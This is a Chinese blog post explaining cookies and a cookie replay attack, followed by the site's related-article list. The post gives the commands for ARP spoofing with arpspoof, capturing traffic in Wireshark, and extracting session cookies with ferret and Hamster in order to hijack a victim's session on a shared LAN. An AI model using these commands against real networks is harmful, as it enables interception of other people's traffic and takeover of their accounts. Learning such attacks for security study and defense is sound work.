Cookie重放攻击

最新推荐文章于 2023-03-01 16:37:25 发布
最新推荐文章于 2023-03-01 16:37:25 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: web 文章标签: cookie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45089570/article/details/104796592
版权

Cookie介绍

cookie:
(小甜饼,外国程序猿还是很有情调的)
服务器存储到客户机器上的信息

作用:
1.用于记录用户历史登录网站的情况(自动识别)
2.网站可以利用cookies跟踪统计用户访问该网站的习惯,比如什么时间访问,访问了哪些页面,在每个网页的停留时间等(利用cookie跟踪用户行为)
(利用这些信息,一方面是可以为用户提供个性化的服务)
3.记录用户登录信息(很容易泄密)

生存周期:
1.Cookie可以保持登录信息到用户下次与服务器的会话
2.Cookie在生成时就会被指定一个Expire值,这就是Cookie的生存周期,在这个周期内Cookie有效,超出周期Cookie就会被清除。
有些页面将Cookie的生存周期设置为“0”或负值,这样在关闭浏览器时,就马上清除Cookie,不会记录用户信息

局域网内获取cookie

我的攻击思路是,在同一局域网下利用arp欺骗,我们作为一个中间人获取对方的流量,从中分离出来其中的cookie信息,从而达到cookie重放。

arp欺骗

需要使用到kali上的工具: arpspoof
安装步骤:apt-get install dsniff ssldump

使用:

echo 1 >> /proc/sys/net/ipv4/ip_forward
 arpspoof   -i   网卡   -t    目标IP    网关

在这里插入图片描述

wireshark抓包

arp欺骗启动后,对方所有的数据包都会经过我这台kali机,wireshark就可以抓包了,抓取的数据包保存为cookie.pcap

ferret -r cookie.pcap(你抓取的数据包) //这一步是为了从中获取其中的cookie信息
在这里插入图片描述从中提取出来一个hamster.txt文件
在这里插入图片描述
Hamster通过对网络上流动数据的会话监听,从而抓取可见的会话Cookie,然后再将这些监听到的Cookie导入到特定浏览器GUI环境中,攻击者就可以轻松的还原掉当前被劫持会话内容。

1

其实,Hamster之所以可以如此表现,是因为它使用了Ferret来进行会话Cookie抓取工作。(如下图)
在这里插入图片描述

西部壮仔
关注
专栏目录
cookie-swap:该库有助于在 connectexpress 会话之外的 node.js 中管理客户端会话 cookie。 需要为快速会话维护一个 htttpOnly cookie(通过 XSS 抢夺 cookie 来验证用户并防止重放攻击),同时在客户端可访问和修改的 cookie 中存储一些会话状态
06-14
最好为快速会话维护一个 htttpOnly cookie(以验证用户并通过 XSS 抢夺 cookie 来防止重放攻击),同时在客户端可访问和修改的 cookie 中存储一些会话状态。 客户端会话在req.clientSession ,类似于 connect/...
什么是Cookie-Session重放攻击
xsgnzb的专栏
03-07 984
Cookie-Session 重放攻击是一种网络攻击方式,攻击者利用被攻击者已有的认证 Cookie 或 Session ID 等信息,重复发送该信息进行身份验证,从而获得访问权限。
“黑客”入门学习之“Cookie技术详解”
Python栈_基的博客
03-01 1811
"重放攻击"大家应该听说过吧?重放攻击时黑客常用的攻击方式之一,攻击者发送一个目的主机已接收过的包,来达到欺骗系统的目的,主要用于身份认证过程,破坏认证的正确性。这种攻击会不断恶意或欺诈性地重复一个有效的数据传输,重放攻击可以由发起者,也可以由拦截并重发该数据的敌方进行。攻击者利用网络监听或者其他方式盗取认证凭据,之后再把它重新发给认证服务器。重放攻击监听http数据传输的截获的敏感数据大多数就是存放在Cookie中的数据。在web安全中的通过其他方式(非网络监听)盗取Cookie与提交Cookie也是一种
登录重放攻击_窗体身份验证 - Cookie重放攻击 - 保护
weixin_39679370的博客
01-17 345
I am being asked about cookie replay attacks with my ASP.NET websites forms authentication.I have followed the advice below to protect against any attack but think that the site is still vulnerable if...
重放攻击(Replay Attacks)
weixin_33907511的博客
12-01 1216
重放攻击(Replay Attacks)1.什么是重放攻击顾名思义,重复的会话请求就是重放攻击。可能是因为用户重复发起请求,也可能是因为请求被攻击者获取,然后重新发给服务器。2.重放攻击的危害请求被攻击者获取,并重新发送给认证服务器,从而达到认证通过的目的。我们可以通过加密,签名的方式防止信息泄露,会话被劫持修改。但这种方式防止不了重放攻击。3.重放攻击的防御1)时间戳验证请求时加上客户端当前时间...
第三方库 Guzzle 修复高危的跨域 cookie 泄露漏洞,影响 Drupal等
smellycat000的专栏
05-30 779
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士PHP 应用程序的热门HTTP客户端 Guzzle 的维护人员,修复了一个可导致跨域cookie 泄露的高危漏洞 (CVE-2022-29248)。开源的内容管理系统 Drupal 是使用该第三方库的应用程序之一,目前已发布软件更新解决了这个问题。该漏洞位于Guzzle 的 cookie 中间件中,默认禁用。Guzzle...
Python cookie的保存与读取、SSL讲解
09-17
- 安全特性:除了加密,SSL还提供了完整性检查和防止重放攻击的功能,确保数据不被篡改和重复使用。 在Python中,通常使用`urllib`库的`HTTPSHandler`来处理HTTPS请求,它会自动处理SSL证书验证等安全问题。 总结...
基于可变Cookie的跨域单点登录
01-29
传统的单点登录解决方案大多依赖于固定的认证机制,如使用静态密钥进行Cookie加密,这种方式容易受到安全威胁,例如中间人攻击或重放攻击。基于可变Cookie的跨域单点登录方案通过以下几个关键步骤来克服这些问题: ...
BurpSuite手册-040-Burps browser.pdf
12-28
16. **Response extraction rules**:响应提取规则帮助提取和处理响应中的特定信息,如cookie或动态令牌。 17. **Manual testing simulator**:手动测试模拟器为自动化测试提供了更多的人工智能,模仿人类测试者的...
jsp之Cookie自动登录
08-24
- 对Session ID进行安全哈希处理,防止被预测或重放攻击。 ### 5. 扩展——Session与Cookie比较 - Session存储在服务器端,内存中,信息量大,安全性相对较高,但服务器资源消耗较大。 - Cookie存储在客户端,占用...
Cookie篡改攻击
qfzhaohan的博客
12-09 5507
什么是cookie篡改? 在我们深入探讨前,我们先快速地理清一下术语。狭义上,cookie篡改攻击指直接修改已存在的cookie值。cookies只是存储在用户浏览器的文本值,因此,如果没有额外的防护措施,你可轻松地通过手动或者Javascript的document.cookie属性修改它们。幸运的是这样基础的攻击很少可能出现在现代web开发中,因为现代web开发中会话管理和其它涉及cookie操作的通常框架层面完成。 更广泛地说,“cookie篡改”这术语通常指所有的cookie相关的攻击,即使不涉及
重放攻击与中间人攻击
loveCC_orange的博客
12-23 5291
重放攻击与中间人攻击 大概有多半年没有更新博客了吧,本来还想保持最起码一月一更的 ,但是考研复习后面越来越紧张,一直到今天,最后一科专业课考完,绷了一年的紧张的神经,终于可以稍微缓一缓了,本想着先休息一下,缓个两三天再开始总结的,但是突然发现:之前一直紧张的复习,现在突然闲下来不知道干嘛,那索性就从今天开始总结吧,虽然考得不咋样,数学有点凉~哎,不说了,直接到今天的主题:重放攻击和中间人攻击! 专...
重放攻击及防御方案
iteye_3338的博客
07-01 1961
什么是重放攻击   所谓重放攻击就是攻击者发送一个目的主机已接收过的包,来达到欺骗系统的目的,主要用于身份认证过程。   攻击者利用网络监听或者其他方式盗取认证凭据,之后再把它重新发给认证服务器。从这个解释上理解,加密可以有效防止会话劫持,但是却防止不了重放攻击重放攻击任何网络通讯过程中都可能发生。   重放攻击的类型   根据消息的来源:   协议轮内攻击:一个协议轮内消息重放 ...
什么是重放攻击与中间人攻击?
freshmangetup的博客
10-17 4717
重放攻击又称为(ReplayAttacks)又称重播攻击、回放攻击或新鲜性攻击(FreshnessAttacks),是指攻击者发送一个目的主机已接收过的包,来达到欺骗系统的目的,主要用于身份认证过程,破坏认证的正确性。 它是一种攻击类型,这种攻击会不断恶意或欺诈性地重复一个有效的数据传输,重放攻击可以由发起者,也可以由拦截并重发该数据的敌方进行。 重放攻击cookie 我们监听http数据传输的截获的敏感数据大多数就是存放在cookie中的数据。其实在web安全中的通过其他方式(非网络监听)盗取co
重放攻击的概念简介
Kiritow的学园
07-02 4023
最近正在研究这方面的内容,Mark下
老生常谈重放攻击的概念(必看篇)
热门推荐
heluan123132的博客
07-05 4万+
重放攻击的概念 根据百科的解释:重放攻击(Replay Attacks)又称重播攻击、回放攻击或新鲜性攻击(Freshness Attacks),是指攻击者发送一个目的主机已接收过的包,来达到欺骗系统的目的,主要用于身份认证过程,破坏认证的正确性。 它是一种攻击类型,这种攻击会不断恶意或欺诈性地重复一个有效的数据传输,重放攻击可以由发起者,也可以由拦截并重发该数据的敌方
安全测试之重放攻击
weixin_37998428的博客
08-17 5782
1,简短说明 1,什么是重放攻击? 抓包工具拦截并克隆你的请求,用克隆的请求访问你的后台 抓包工具可以克隆请求的所有内容(url,data,cookie,session,header等等) 2,如何防御重放攻击 网上有很多方法,思路多也广,下面介绍下我用到的方法 环境:内网环境,访问量不大 因为内网,所以客户端与服务端时间不好协调一致,时间戳不适用 于是联想到,手机登录验证码 ...
微软公司采用最新研发的Storm-1167来达到跟踪该集群的目的,指出该网络攻击团伙使用间接代理来达到攻击的目的。网络攻击团伙凭借他们的目标定制网络钓鱼页面并进行会话cookie窃取。此次网络攻击作案手法不同于其他AitM活动,在其他AitM活动中,诱饵页面可以充当反向代理,以获取受害者输入的凭据和基于时间的一次性密码(TOTP)。攻击链从一封指向链接的网络钓鱼电子邮件开始,单击该链接后,受害者会重定向到一个欺骗性的Microsoft登入页面并窃取输入的凭据和TOTP。然后使用获取的密码和会话cookie来冒充用户,并通过重放攻击获得对电子邮件收件箱的未授权访问。该访问权限随后被滥用以获取敏感电子邮件并策划BEC攻击。更为重要的是一种新的基于SMS的双因素身份验证方法被添加到目标账户,以便使用窃取的凭借登录而不会引起任何注意。 文本修缮
最新发布
06-14
随后,攻击者使用获取的密码和会话cookie来冒充用户,并通过重放攻击获得对电子邮件收件箱的未授权访问。攻击者滥用此访问权限以获取敏感电子邮件并策划BEC攻击。更为重要的是,攻击者添加了一种新的基于SMS的双因素...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值